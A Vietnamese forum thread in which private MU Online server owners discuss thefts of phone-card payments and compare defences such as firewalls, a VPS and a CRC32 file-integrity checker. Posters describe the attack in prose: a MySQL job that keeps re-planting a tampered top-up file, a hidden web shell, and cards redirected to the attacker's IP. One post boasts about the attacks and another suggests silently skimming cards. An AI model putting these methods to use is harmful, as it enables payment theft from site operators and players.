- File php.ini mình đề cập ở trên chỉ có tác dụng tại thư mục chứa nó, các thư mục không chứa nó sẽ không bị nó chi phối mà sẽ bị cấu hình trong php.ini của server chi phối.
- Các file php.ini và .htaccess nên chmod 444 để bảo vệ cấu hình.

nguồn : <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

đã nghe từ bypass chưa ? giống hack mu ấy

Mình cũng từng là nạn nhân của hieun0va.
Và mình biết phương thức hoạt động hack.
hieun0va chèn vào auto nạp thẻ cái file: vpoint_cardphone
để thay thế file cũ của bạn.
Là đã hack dc thẻ, thẻ chuyển từ host qua hệ thống auto nạp thẻ của hieun0va luôn
Mình phát hiện dc vì mình có người quen bên Ngân Lượng trợ giúp tìm hiểu nguyên nhân.
Và cách hack của hieun0va là hack qua mysql.
Thông qua port có thể đăng nhập điều khiển máy chủ.
và chèn vào 1 con auto tự động coppy file vpoint_cardphone vào phần auto nạp thẻ. Các bạn có lưu bộ nguyên bản coppy lại thì lập tức 1 lúc sau nó lại tự động coppy cái của hieun0va vào.
Cách chống: ngoài port game nên bảo bên cung cấp máy chủ , chặn toàn bộ IP vào các port còn lại chỉ để 1 IP duy nhất đăng nhập

Nếu ai biết địa chỉ hieun0va commen lại bài này dùm mình nhé. Mình sử lý chút việc riêng

Mình cũng từng là nạn nhân của hieun0va.
Và mình biết phương thức hoạt động hack.
hieun0va chèn vào auto nạp thẻ cái file: vpoint_cardphone
để thay thế file cũ của bạn.
Là đã hack dc thẻ, thẻ chuyển từ host qua hệ thống auto nạp thẻ của hieun0va luôn
Mình phát hiện dc vì mình có người quen bên Ngân Lượng trợ giúp tìm hiểu nguyên nhân.
Và cách hack của hieun0va là hack qua mysql.
Thông qua port có thể đăng nhập điều khiển máy chủ.
và chèn vào 1 con auto tự động coppy file vpoint_cardphone vào phần auto nạp thẻ. Các bạn có lưu bộ nguyên bản coppy lại thì lập tức 1 lúc sau nó lại tự động coppy cái của hieun0va vào.
Cách chống: ngoài port game nên bảo bên cung cấp máy chủ , chặn toàn bộ IP vào các port còn lại chỉ để 1 IP duy nhất đăng nhập

Nếu ai biết địa chỉ hieun0va commen lại bài này dùm mình nhé. Mình sử lý chút việc riêng

Địa chỉ đã cm ở trên rồi đó :D

Mình bị 3 phát hack thẻ.
1- bị ở trên hosting mục firewall bị chèn file checkblockip.php gì đó là shell, đã xóa toàn bộ web trên hosting rồi setup lại code mới của nbb mà vài ngày sau vẫn dính tiếp :(
2- bị truy cập vào server sửa code nạp thẻ, chặn không cho truy cập vào baokim.vn và nganluong.vn

Quả thật là mấy con người này rất giã man :(

Mình bị 3 phát hack thẻ.
1- bị ở trên hosting mục firewall bị chèn file checkblockip.php gì đó là shell, đã xóa toàn bộ web trên hosting rồi setup lại code mới của nbb mà vài ngày sau vẫn dính tiếp :(
2- bị truy cập vào server sửa code nạp thẻ, chặn không cho truy cập vào baokim.vn và nganluong.vn

Quả thật là mấy con người này rất giã man :(

như thế là hieunova đã upshell lên host cùng trên IP máy chủ cùng host với bạn rồi theo mình đồng ý với ninhmca là mua 1 vps linux 512mb chạy ok và ko lo bị ddos và có thể đặt client đc nữa.Nếu vẫn dùng host thuê thì nguy cơ bị hack là rất cao ngay cả chmod 444 htaccess, 501 public_html , 701 folder, 704 cho file vẫn bị qua host khác cùng trên máy chủ cùng ip

như thế là hieunova đã upshell lên host cùng trên IP máy chủ cùng host với bạn rồi theo mình đồng ý với ninhmca là mua 1 vps linux 512mb chạy ok và ko lo bị ddos và có thể đặt client đc nữa.Nếu vẫn dùng host thuê thì nguy cơ bị hack là rất cao ngay cả chmod 444 htaccess, 501 public_html , 701 folder, 704 cho file vẫn bị qua host khác cùng trên máy chủ cùng ip

chạy trên host nguy cơ local rất cao.cho dùng host bảo mật đến đâu.tuy mình gà nhưng cũng có đề kèm shell vào db forum được.(google cả)
nếu bạn mua 1 vps riêng đặt hosting.win cũng được.firewall tất cả port.chỉ để port 80 và 1 port sv kết nối đến.mình cũng k rõ là bao nhiêu.cái này nhờ pro.nên cài AppServ hơn là xampp vì xampp nhiều chức năng đồng nghĩa với nhiều lỗ.(cờ hó). để thằng hiếu nó chui qua hơn.:-t

như thế là hieunova đã upshell lên host cùng trên IP máy chủ cùng host với bạn rồi theo mình đồng ý với ninhmca là mua 1 vps linux 512mb chạy ok và ko lo bị ddos và có thể đặt client đc nữa.Nếu vẫn dùng host thuê thì nguy cơ bị hack là rất cao ngay cả chmod 444 htaccess, 501 public_html , 701 folder, 704 cho file vẫn bị qua host khác cùng trên máy chủ cùng ip

HIEUNOVA ko thể thừa hơi đii mua host cùng nơi bạn thuê để úp lên dc

điều này là ko khả quan vì mình thay host thì biết host nơi nào mà thuê để local

có thể nguyên do là máy chủ config yếu thôi

như thế là hieunova đã upshell lên host cùng trên IP máy chủ cùng host với bạn rồi theo mình đồng ý với ninhmca là mua 1 vps linux 512mb chạy ok và ko lo bị ddos và có thể đặt client đc nữa.Nếu vẫn dùng host thuê thì nguy cơ bị hack là rất cao ngay cả chmod 444 htaccess, 501 public_html , 701 folder, 704 cho file vẫn bị qua host khác cùng trên máy chủ cùng ip

hacking đâu chỉ có mỗi local attack :)
và bạn có thể giải thích hộ mình là chmod 444, 501, 701, 704 có tác dụng gì :-/
mình thắc mắc là gsm.vn, bkns.vn, bsg.vn, sannhac.com, ... cũng chạy server tại sao lại bị hack
=> k có gì là tuyệt đối cả

HIEUNOVA ko thể thừa hơi đii mua host cùng nơi bạn thuê để úp lên dc

điều này là ko khả quan vì mình thay host thì biết host nơi nào mà thuê để local

có thể nguyên do là máy chủ config yếu thôi

Hình như từ đầu đến giờ bạn chưa hiểu ra vấn đề :)
Vấn đề ở đây là bị hack trên hosting chứ không phải là hack trên sv
Bị sửa file nạp thẻ ở host , thẻ được gửi về địa chỉ của người hack chứ không gửi về sv
Nên SV không liên quan gì ở đây

Hình như từ đầu đến giờ bạn chưa hiểu ra vấn đề :)
Vấn đề ở đây là bị hack trên hosting chứ không phải là hack trên sv
Bị sửa file nạp thẻ ở host , thẻ được gửi về địa chỉ của người hack chứ không gửi về sv
Nên SV không liên quan gì ở đây

bạn mới là kẻ ko hiểu vấn đề

host thì hầu hết chạy trên vps linux

nếu vps linux mà bên bán config quá kém thì việc local attack hosting là đơn giản với họ

Còn khi local attack chỉ duy nhất 2 khả năng

1 . bug code

2. là config quá kém máy chủ bảo mật linux

đọc kỹ đi bạn tôi hỏi rát cổ vấn đề này rồi - đừng nghĩ host nơi nào cũng gióng như anh philip nói thì chuẩn đó

1 khi bị hack host thì khả năng bị sv là rất dễ bị tiếp theo

Các bạn mở MU lớn thì chịu khó bỏ ra 5 triệu mua cái máy chủ chạy web riêng có phải ha hơn không nhỉ (:|

HIEUNOVA ko thể thừa hơi đii mua host cùng nơi bạn thuê để úp lên dc

điều này là ko khả quan vì mình thay host thì biết host nơi nào mà thuê để local

có thể nguyên do là máy chủ config yếu thôi
bạn nói là k đúng rồi.họ chỉ cần xem ip là họ biết bạn thuê ở đâu ngay.google là ra.còn sell thì họ có thể up trược tiếp lên host của bạn hoặc host khác họ local sang.k nhất thiết phải đi thuê host.còn nguyên nhân là họ sửa code và đặt luôn auto nạp thẻ của họ trên host.men nạp thẻ gửi vào auto chứ k gửi về auto ở server.

--- Chế độ gộp bài viết ---


hacking đâu chỉ có mỗi local attack :)
và bạn có thể giải thích hộ mình là chmod 444, 501, 701, 704 có tác dụng gì :-/
mình thắc mắc là gsm.vn, bkns.vn, bsg.vn, sannhac.com, ... cũng chạy server tại sao lại bị hack
=> k có gì là tuyệt đối cả

ở các web bạn nói là họ scan shell mỗi ngày.chứ k thể chống hoàn toàn được.cái gì cũng phải có lỗi.ngay cả vtc còn có thể hack được.( mình thì k đủ khả năng)
và phải hiểu mục đích hack ở đây là tiền.mấy cái web kia họ kiếm được k.và mục tiêu là các game lậu.chứ họ ngu gì hack vtc để bóc lịch.:-q

--- Chế độ gộp bài viết ---


Các bạn mở MU lớn thì chịu khó bỏ ra 5 triệu mua cái máy chủ chạy web riêng có phải ha hơn không nhỉ (:|

5 triệu mua 1 cái máy chủ chạy web à.có vẻ quá hài.:-"

Các bạn mở MU lớn thì chịu khó bỏ ra 5 triệu mua cái máy chủ chạy web riêng có phải ha hơn không nhỉ (:|
bỏ 5tr chạy web riêng rồi đóng mu luôn cho nhẹ người =))

Tôi hướng dẫn thế này thì hack = mắt :

làm 1 máy riêng máy đó chỉ Open Port 80 , còn lại block hết

Máy đó chỉ dùng để chứa code nạp thẻ của bạn ( bạn làm 10 hay 50 cái Mu thì cũng chỉ cái máy đó và tất nhiên mỗi MU 1 domain riêng mà )

Các bạn tính thử theo tớ nhé .

1 Máy cấu hình :

RAM 1G thôi
main Intel ( chạy 24/24 đảm bảo tồn tại đc 4 năm đến 5 năm )
HDD : chơi loại 160 hoặc 80 thôi
Chip : ko cần xịn mà cần bền
Nguồn chơi loại bền và khỏe
Màn hình ko cần ( vì mình remote mạng Lan

Tổng chi phí : 4 củ ( mà sợ ko đến )

1 Mạng : ADSL gia đình có 2 lựa chọn :

1 > Của viettel : giá rẻ tốc độ cao :))
2. Tùy lựa chọn

Giá 1 ADSL : giao động từ 180K đên 250K


bảo mật : Máy đó là PC cho nên ta cài sygate ( bài CLB có rồi nhưng hình như bị xóa )

ưu điểm Sygate :
1. Bảo mật khỏi phải chê :D
2. Thích allow IP nào hoặc Block cả dải Ip nào cũng đc


Trên đây là tớ chỉ hướng cho các bạn , còn tớ thì từ trước tới toàn Dùng PC ( Sắm 1 em máy ngon , mạng ngon tầm 32mb ) để chưa web ( và tất nhiên chứa có thể lên 5 hay 10 Mu cùng 1 lúc cũng đc >> chi phí thì các bạn tự hiểu rẻ hơn đi thuê là điều hiển nhiên 100% =)))

Tôi hướng dẫn thế này thì hack = mắt :

làm 1 máy riêng máy đó chỉ Open Port 80 , còn lại block hết

Máy đó chỉ dùng để chứa code nạp thẻ của bạn ( bạn làm 10 hay 50 cái Mu thì cũng chỉ cái máy đó và tất nhiên mỗi MU 1 domain riêng mà )

Các bạn tính thử theo tớ nhé .

1 Máy cấu hình :

RAM 1G thôi
main Intel ( chạy 24/24 đảm bảo tồn tại đc 4 năm đến 5 năm )
HDD : chơi loại 160 hoặc 80 thôi
Chip : ko cần xịn mà cần bền
Nguồn chơi loại bền và khỏe
Màn hình ko cần ( vì mình remote mạng Lan

Tổng chi phí : 4 củ ( mà sợ ko đến )

1 Mạng : ADSL gia đình có 2 lựa chọn :

1 > Của viettel : giá rẻ tốc độ cao :))
2. Tùy lựa chọn

Giá 1 ADSL : giao động từ 180K đên 250K


bảo mật : Máy đó là PC cho nên ta cài sygate ( bài CLB có rồi nhưng hình như bị xóa )

ưu điểm Sygate :
1. Bảo mật khỏi phải chê :D
2. Thích allow IP nào hoặc Block cả dải Ip nào cũng đc


Trên đây là tớ chỉ hướng cho các bạn , còn tớ thì từ trước tới toàn Dùng PC ( Sắm 1 em máy ngon , mạng ngon tầm 32mb ) để chưa web ( và tất nhiên chứa có thể lên 5 hay 10 Mu cùng 1 lúc cũng đc >> chi phí thì các bạn tự hiểu rẻ hơn đi thuê là điều hiển nhiên 100% =)))
thuê vps k được à.mà nhất thiết phải mua máy tính riêng.còn gói adsl của bạn ddos phát die toàn tập.:-s

Mọi người cho hỏi giờ thuê 1 VPS 1GB để chạy Web riêng và kỹ thuật Hosting nó cài đặt bảo mật và theo dõi hộ mình xem có bị hack nữa không với giá 500k/tháng thì có nên thuê không nhỉ , mình đang băn khoăn là Mu mình nhỏ được vài chục người thuê sợ kiếm được ít :|

thuê vps k được à.mà nhất thiết phải mua máy tính riêng.còn gói adsl của bạn ddos phát die toàn tập.:-s

VPS thì ...
ddos die toàn tập thì cái nào của bạn ko bị die bạn thử cho tôi test phát xem die ko

--- Chế độ gộp bài viết ---


Mọi người cho hỏi giờ thuê 1 VPS 1GB để chạy Web riêng và kỹ thuật Hosting nó cài đặt bảo mật và theo dõi hộ mình xem có bị hack nữa không với giá 500k/tháng thì có nên thuê không nhỉ , mình đang băn khoăn là Mu mình nhỏ được vài chục người thuê sợ kiếm được ít :|
VPS cũng chỉ là ảo thôi bạn ah

Ảo nhưng nó riêng biệt còn gì, 1 mình chạy 1 web mà vẫn bị à :-s , khó khăn quá

VPS thì ...
ddos die toàn tập thì cái nào của bạn ko bị die bạn thử cho tôi test phát xem die ko

--- Chế độ gộp bài viết ---


VPS cũng chỉ là ảo thôi bạn ah
chinhphu.vn
đó bạn test nhiệt tình đi.
còn ảo ở đây có lẽ bạn chưa hiểu rồi.vps nếu thuê thêm 1 người quản lý scan mỗi ngày là được.1tr là cùng.
vps k thể local được.bảo mật là do mình chứ k phải như host.vậy ảo ở chỗ nào.~:>

1 vps chạy web hay còn gọi là winlinux thì cứ từ trên 1 triệu vnd / 1 tháng trở lên ko bao h có giá 5 lýt


chinhphu.vn
đó bạn test nhiệt tình đi.
còn ảo ở đây có lẽ bạn chưa hiểu rồi.vps nếu thuê thêm 1 người quản lý scan mỗi ngày là được.1tr là cùng.
vps k thể local được.bảo mật là do mình chứ k phải như host.vậy ảo ở chỗ nào.~:>


ở đây lắm cao thủ lắm ninhmca đừng quá tự tin - người bảo mật ko bao h người ta đi chia sẻ ầm ầm như bạn nghĩ đâu

bảo mật là phải tuyệt đối vì khi nó biết cách bảo mật thì nó sẽ tìm dc cách để phá

như kiểu có thằng xây nhà ắt có mấy thằng đi phá nhà

bạn ko phải người bảo mật thì đừng tự tin 100% như thế

ở đây cao thủ nhiều lắm chả qua họ ko tham gia hoặc đang tìm cách local thôi nói nhỏ đi cái ji biết thì nói ko biết đừng đừng chỉ bậy

đã mở cổng 80 ra thì vấn đề bảo mật là phải suy tính nhiều rồi đừng nghĩ chỉ cổng 80 ko là bền nhé

Tôi hướng dẫn thế này thì hack = mắt :

làm 1 máy riêng máy đó chỉ Open Port 80 , còn lại block hết

Máy đó chỉ dùng để chứa code nạp thẻ của bạn ( bạn làm 10 hay 50 cái Mu thì cũng chỉ cái máy đó và tất nhiên mỗi MU 1 domain riêng mà )

Các bạn tính thử theo tớ nhé .

1 Máy cấu hình :

RAM 1G thôi
main Intel ( chạy 24/24 đảm bảo tồn tại đc 4 năm đến 5 năm )
HDD : chơi loại 160 hoặc 80 thôi
Chip : ko cần xịn mà cần bền
Nguồn chơi loại bền và khỏe
Màn hình ko cần ( vì mình remote mạng Lan

Tổng chi phí : 4 củ ( mà sợ ko đến )

1 Mạng : ADSL gia đình có 2 lựa chọn :

1 > Của viettel : giá rẻ tốc độ cao :))
2. Tùy lựa chọn

Giá 1 ADSL : giao động từ 180K đên 250K


bảo mật : Máy đó là PC cho nên ta cài sygate ( bài CLB có rồi nhưng hình như bị xóa )

ưu điểm Sygate :
1. Bảo mật khỏi phải chê :D
2. Thích allow IP nào hoặc Block cả dải Ip nào cũng đc


Trên đây là tớ chỉ hướng cho các bạn , còn tớ thì từ trước tới toàn Dùng PC ( Sắm 1 em máy ngon , mạng ngon tầm 32mb ) để chưa web ( và tất nhiên chứa có thể lên 5 hay 10 Mu cùng 1 lúc cũng đc >> chi phí thì các bạn tự hiểu rẻ hơn đi thuê là điều hiển nhiên 100% =)))

Chuẩn, kèm theo cái web sạch là xong :D

Bistro lấy nick chính ra mà nói, đừng lấy nick clone ra rồi kêu là cần tìm anh có việc riêng. Cái anh quậy ở server em chỉ là job SQL cho nó tự động chạy query copy file của cmd trong mỗi 5 phút thôi.

Thật sự chỉ chỉ có vài 2-3 người thực sự bị hack thôi mà các pác ném gạch lắm thế.

Về phần hào hoa công tử, khi đã biết muhoanggia.vn và muhongngoc.vn anh đã thôi thật rồi, nhưng hôm bữa thằng em nó kêu đói, anh ném nó cái usb lưu info của 1 số mu vào kêu nó hốt đk gì thì hốt, ai ngờ quên chưa xóa info của em ^^!

chinhphu.vn
đó bạn test nhiệt tình đi.
còn ảo ở đây có lẽ bạn chưa hiểu rồi.vps nếu thuê thêm 1 người quản lý scan mỗi ngày là được.1tr là cùng.
vps k thể local được.bảo mật là do mình chứ k phải như host.vậy ảo ở chỗ nào.~:>
ddos chinhphu.vn ;)) lại trả lời cùn r`

đồng ý là bảo mật do mình mà mình bảo mật kém hoặc chẳng biết tí nào thì thuê vps làm gì :-/
thuê vps thuê thêm ng` => mất thêm 1 khoảng tiền mà đâu phải 1 site 1 server là ổn đâu
tại sao k tìm hiểu, tự học security
performance tuning, anti ddos kiến thức đầy trên google

Chuẩn, kèm theo cái web sạch là xong :D

Bistro lấy nick chính ra mà nói, đừng lấy nick clone ra rồi kêu là cần tìm anh có việc riêng. Cái anh quậy ở server em chỉ là job SQL cho nó tự động chạy query copy file của cmd trong mỗi 5 phút thôi.

Thật sự chỉ chỉ có vài 2-3 người thực sự bị hack thôi mà các pác ném gạch lắm thế.

Về phần hào hoa công tử, khi đã biết muhoanggia.vn và muhongngoc.vn anh đã thôi thật rồi, nhưng hôm bữa thằng em nó kêu đói, anh ném nó cái usb lưu info của 1 số mu vào kêu nó hốt đk gì thì hốt, ai ngờ quên chưa xóa info của em ^^!


Send mail anh đi dạo này đói quá =))

nghe đồn C50 vào cuộc nên nằm chờ kết quả .

=))

Send mail anh đi dạo này đói quá =))

nghe đồn C50 vào cuộc nên nằm chờ kết quả .

=))

C50 vào cuộc nên các pác sẽ là ng toi trước, em thành vô can ^^! lí do tại sao thì chắc pác tự hiểu được :D

C50 vào cuộc nên các pác sẽ là ng toi trước, em thành vô can ^^! lí do tại sao thì chắc pác tự hiểu được :D

Anh bảo này em làm cách này hay lắm mà đảm bảo ...

Code cho no nếu sai >> trả lại nó Để web server nó ghi log sai ;))

Còn nếu đúng ta cũng cho nó ghi là sai ;))

Khi đó Admin Sẽ nghĩ ah chắc thằng này nạp sai =))

Hoặc nữa là cho random 3 cái lấy 1 , :

Tuy ăn ít nhưng bền =))

;))

To all : Đừng chém nhé chỉ vui thôi

--- Chế độ gộp bài viết ---


C50 vào cuộc nên các pác sẽ là ng toi trước, em thành vô can ^^! lí do tại sao thì chắc pác tự hiểu được :D


Vừa làm cho thằng em cái này vui lắm này em .

Viết = C :

nghĩa là trên server chạy 1 file exe, file đó ta kiểm ra CRC32 của những file cần thiết ( cứ 5s hoặc 10s kiểm tra 1 lần ) nếu sai coppy file đó ở đâu đó hoặc chỗ nào đó về ;))

:))

trên đây cũng là cách cho các bạn có bộ web sạch mà lo sợ bị đính " Con đen đen " =))

hacking đâu chỉ có mỗi local attack :)
và bạn có thể giải thích hộ mình là chmod 444, 501, 701, 704 có tác dụng gì :-/
mình thắc mắc là gsm.vn, bkns.vn, bsg.vn, sannhac.com, ... cũng chạy server tại sao lại bị hack
=> k có gì là tuyệt đối cả

chmod như thế là ko cho download code,xem code ,thay đổi cấu trúc code,những nhà mạng kia rất uy tín vì mình dùng bkns khá lâu rồi bị hack thì họ là nhà cung cấp host mà 1 máy chủ của họ có đến vài trăm hoặc vài ngin host trên máy chủ đó thì chuyện hack là đương nhiên
còn điều thứ 2 mình đã nói rõ thuê 1 con vps riêng để giảm bị hack nhất đúng là ko có gì là tuyệt đối

Mình bị 3 phát chứng tỏ nằm trong số nạn nhân đó, tha muhpvn đi ông anh ơi :(

bạn mới là kẻ ko hiểu vấn đề

host thì hầu hết chạy trên vps linux

nếu vps linux mà bên bán config quá kém thì việc local attack hosting là đơn giản với họ

Còn khi local attack chỉ duy nhất 2 khả năng

1 . bug code

2. là config quá kém máy chủ bảo mật linux

đọc kỹ đi bạn tôi hỏi rát cổ vấn đề này rồi - đừng nghĩ host nơi nào cũng gióng như anh philip nói thì chuẩn đó

1 khi bị hack host thì khả năng bị sv là rất dễ bị tiếp theo

Bạn không thấy từ đầu đến giờ mình và 1 số người kêu bị hack trên host chứ ai kêu bị hack trên Sv :))
Ví dụ khi mem nạp thẻ , nếu chưa bị hack -> thẻ gửi về ip sv bạn
Còn khi bị hack -> mem nạp thẻ -> thẻ gửi về ip của người hack
Chẳng liên quan gì đến sv ở đây , vậy do host hay do sv
( Những bạn bị hack mở các file nạp thẻ trên host sẽ thấy 1 đường dẫn đến ip của người hack )

--- Chế độ gộp bài viết ---


Chuẩn, kèm theo cái web sạch là xong :D

Bistro lấy nick chính ra mà nói, đừng lấy nick clone ra rồi kêu là cần tìm anh có việc riêng. Cái anh quậy ở server em chỉ là job SQL cho nó tự động chạy query copy file của cmd trong mỗi 5 phút thôi.

Thật sự chỉ chỉ có vài 2-3 người thực sự bị hack thôi mà các pác ném gạch lắm thế.

Về phần hào hoa công tử, khi đã biết muhoanggia.vn và muhongngoc.vn anh đã thôi thật rồi, nhưng hôm bữa thằng em nó kêu đói, anh ném nó cái usb lưu info của 1 số mu vào kêu nó hốt đk gì thì hốt, ai ngờ quên chưa xóa info của em ^^!


Vậy mà vẫn bị hack đó thôi..........................

Nếu hack được thì họ sẽ cứ hack chẳng ai chịu từ bỏ bao giờ trừ khi mình khắc phục được thôi...

dạo này hack card kinh quá :)

1. hack từ server cái này thì khó chịu vì gamer vẫn nhận được $ vì vậy admin khó biết được card mất :)
2. hack từ host cái này thì dễ biết hơn vì do card gữi về server người hack nên gamer nạp vào ghi thẻ sai và không được $ lúc đó sẽ pm admin và hỏi lý do, admin lúc đó sẽ biết bị hack nhưng số thẻ đã ra đi :)

và cuối cùng là hack thì không phải 1 mình hieunova :) hack thì nhiều còn người có thể anti được thì ít, và người anti được tất nhiên sẽ không hướng dẫn free cho bạn vì họ cũng như bạn đều bỏ công sức ra mà kiếm cơm :)

Cuối cùng thì chỉ còn cách tìm người pro về anti nhờ họ hướng dẫn tất nhiên chịu tốn phí.
hoặc là tự mò tìm cách chống hack và kiểm tra thường xuyên host và server của mình coi có bị chèn code lạ vào không.

1 vps chạy web hay còn gọi là winlinux thì cứ từ trên 1 triệu vnd / 1 tháng trở lên ko bao h có giá 5 lýt




ở đây lắm cao thủ lắm ninhmca đừng quá tự tin - người bảo mật ko bao h người ta đi chia sẻ ầm ầm như bạn nghĩ đâu

bảo mật là phải tuyệt đối vì khi nó biết cách bảo mật thì nó sẽ tìm dc cách để phá

như kiểu có thằng xây nhà ắt có mấy thằng đi phá nhà

bạn ko phải người bảo mật thì đừng tự tin 100% như thế

ở đây cao thủ nhiều lắm chả qua họ ko tham gia hoặc đang tìm cách local thôi nói nhỏ đi cái ji biết thì nói ko biết đừng đừng chỉ bậy

đã mở cổng 80 ra thì vấn đề bảo mật là phải suy tính nhiều rồi đừng nghĩ chỉ cổng 80 ko là bền nhé

ở đây mình đâu có nói là đảm bao 100% k bị hack đâu.những cái mình nói chỉ giảm được phần nào đó các thể loại local thông dụng trên google thôi.
còn mình cũng chưa bị hack.mình cũng k thể biết nó up shell theo đường nào mà nói 100% chuẩn cho ae.còn mình chỉ góp ý.ai nghe thì nghe.k nghe thì họ làm kiểu khác.(*)

Bạn không thấy từ đầu đến giờ mình và 1 số người kêu bị hack trên host chứ ai kêu bị hack trên Sv :))
Ví dụ khi mem nạp thẻ , nếu chưa bị hack -> thẻ gửi về ip sv bạn
Còn khi bị hack -> mem nạp thẻ -> thẻ gửi về ip của người hack
Chẳng liên quan gì đến sv ở đây , vậy do host hay do sv
( Những bạn bị hack mở các file nạp thẻ trên host sẽ thấy 1 đường dẫn đến ip của người hack )

--- Chế độ gộp bài viết ---




Vậy mà vẫn bị hack đó thôi..........................

vấn đề là ở đây cái server để chạy cái host linux cho bạn nó có bảo mật kỹ ko

bạn đã hiểu chưa sv sv mu gì ở đây

Hic lúc chiều rảnh định viết 1 file đơn giản = C++ để anti file


<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>


Phần mềm này như sau :

1. Đây là chỉ là demo vì còn dang dở và nó chỉ check file nmhonlineyb.txt thôi ( cìn lại chưa làm check nhiều file )
1 . Anti file đó không cho thay đổi hay gì cả, kể cả có thay đổi thì 10s check 1 lần nếu sai mã thì sẽ coppy file chuẩn nhất về
2. Cái này có thể đặt trên VPS hay cùng server chứa web

Update sẽ có tùy chọn check và ghi ra database Access ( và có đặt pass )


Vậy là lúc đó ta kiếm 1 web sạch và 1 con VPS rồi ....... là :))

Trình độ non kém tự cảm thấy mình may mắn khi chưa bị các pro sờ gáy. Hầu hết những ai chưa bị hack thẻ ko nên tự mãn mà hãy tin là mình đang may mắn X_X


Hic lúc chiều rảnh định viết 1 file đơn giản = C++ để anti file


<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>


Phần mềm này như sau :

1. Đây là chỉ là demo vì còn dang dở và nó chỉ check file nmhonlineyb.txt thôi ( cìn lại chưa làm check nhiều file )
1 . Anti file đó không cho thay đổi hay gì cả, kể cả có thay đổi thì 10s check 1 lần nếu sai mã thì sẽ coppy file chuẩn nhất về
2. Cái này có thể đặt trên VPS hay cùng server chứa web

Update sẽ có tùy chọn check và ghi ra database Access ( và có đặt pass )


Vậy là lúc đó ta kiếm 1 web sạch và 1 con VPS rồi ....... là :))

cái này bro làm hay quá, trong trường hợp có hack dc vào để sửa file thì cũng càng thêm cay cú khi vừa sửa xong mấy giây sau file lại về mặc định. Mình đi hack mà gặp như vậy chắc điên luôn :D

tôi nay sẽ shre free cho anh em có tùy chọn file và CRC32

Tuy nhiên cái này tớ sẽ shre 100%

Vì dạo này vùa làm đc cái KT và Vo Lam mấy anh đã mail và bên C50 hù dọa nên off luôn

Đang ranh viết code cho anh em 1 cái :

Yêu Cầu :

1. Có VPS hoặc máy chủ ( Vì nó chạy trên máy chủ )
2. Code không mầu mè ( ai đã từng dùng ICM sẽ hiểu ) chi có 1 màn hình cmd

Ưu Điểm :

1. Tranh tình trạng bị local ( vì có 1 chức năng kiểm tra nếu pass win bị đổi 1 phát là tắt máy ( đang nghiêm cứu làm sao đổi lại pass win khi bị đổi ))
2. Chông code thêm file ( nếu phát hiện code của file đó thay đổi sẽ load 1 file từ host về hoặc 1 file từ máy chủ lên host )
4. Anti luôn 1 IP đc phép bao nhiêu lần connect ( tránh tình trạng trẻ trâu ddos ( ở đây là chơi nhau = phương thức 1 IP 1s trên 100 lần truy cập đó nhé chứ ko phải chống ..... đâu nhé )
4. Chả biết có ưu điểm gìkhoong nhưng đứa em nó bị và viết riêng cho nó và ko thấy bị gì nữa ( Ku hiếu nhé chơi ah em anh, mới đầu còn bán tin bán nghi sau đó là ku thật )
5. Lần này cũng là lần cuối ( nếu mà ăn gạch nữa là .... luôn )


Hình ảnh :




Đợi tớ bật máy chủ đã nhé ( VPS nữa )

Mong là có bản chính thức nhanh nhanh để mọi người có thể sống qua mùa mưa bảo :(

Xin đặt cục gạch trước, làm nó chạy trên vps or server mà check được file trên hosting và nếu file trên host bị sửa nó lại up lên được thì hay quá a ạ :D
Và theo e cái phần code "Anti 1 ip được conect bn lần" ko cần thiết lắm. Vì chống DDos hay botnet thì nó vô vàn quá chống đơn giản vậy thì e nghĩ modem hoặc 1 số tool cũng làm đơn giản rùi. A cứ tập trung vào phần 1,2 là ok rồi, check các file rộng ra ko sợ hacker thay đổi luôn cả cấu trúc nạp thẻ ko cần file cũ nữa thì chít. Và cho thêm dòng bản quyền tác giả trong tool nữa để ae còn ghi nhớ công ơn ạ. :D


LHB cho mình xin yahoo với.

Yêu Cầu :

1. Có VPS hoặc máy chủ ( Vì nó chạy trên máy chủ )

working all win là được mà.
30ckarrrrrr.mong sớm có hàng test.8-}

chmod như thế là ko cho download code,xem code ,thay đổi cấu trúc code,những nhà mạng kia rất uy tín vì mình dùng bkns khá lâu rồi bị hack thì họ là nhà cung cấp host mà 1 máy chủ của họ có đến vài trăm hoặc vài ngin host trên máy chủ đó thì chuyện hack là đương nhiên
còn điều thứ 2 mình đã nói rõ thuê 1 con vps riêng để giảm bị hack nhất đúng là ko có gì là tuyệt đối

sv của bkns config theo mình hiện tại thì khá ổn, dịch vụ tốt nhưng cả bkns cũng chẳng ngờ là bkns lại bị hack ;))
bkns từng tài trợ cho bên mình con vps linux ram 4gb chạy forum :D
vps ngon nhưng fải đúng người sử dụng thì nó mới phát huy hết khả năng nó :)
thế bạn có thể giải thích rõ hơn cho mọi người biết chmod như thế là như nào k
ví dụ như quyền ghi, quyền đọc, quyền viết, ...

Ai thuê luôn thằng này về bảo mật cho :-"

Ai thuê luôn thằng này về bảo mật cho :-"

a zai tha cho bọn e làm ăn đi [-O<

Demo cai ini


;================= Dang lam ===========================;
[FILE]
SoFileCheck = 10 ; Tong So File Check o day
ThoiGianCheck = 1000 ;mili giay do nhe cac chang trai
GhiLogCheckManHinh = 1 ; 1 = bat , 0 = tat
GhiLogKhiBiThayDoiFile = 1 ; 1 = bat , 0 = tat

[Admin]
UserAdmin = chuonchuon
MatKhauAdmin = Administrator

[DUONGFILE]
FILE_1 = C:\ChuonChuon.php
CRCFILE_1 =ASFRDS08



Nghĩa Uset Admin cu 10s no check 1 lan neu sai pass nó sẽ tro ve pass mac dinh

Demo cai ini
Nghĩa Uset Admin cu 10s no check 1 lan neu sai pass nó sẽ tro ve pass mac dinh


Nếu đã can thiệp vào được vps rùi thì chả ai ngu mà không can thiệp vào process memory để thay đổi cái biến CRCFILE_1 thành 1 giá trị khác or load vô olly jmp nó đi cho nó chạy vô tác dụng =.='

Vấn đề là ít nhất phải bảo mật làm sao cho chắc cú không thằng nào xỏ xiên được vào VPS cơ :D

Nếu đã can thiệp vào được vps rùi thì chả ai ngu mà không can thiệp vào process memory để thay đổi cái biến CRCFILE_1 thành 1 giá trị khác or load vô olly jmp nó đi cho nó chạy vô tác dụng =.='

Vấn đề là ít nhất phải bảo mật làm sao cho chắc cú không thằng nào xỏ xiên được vào VPS cơ :D


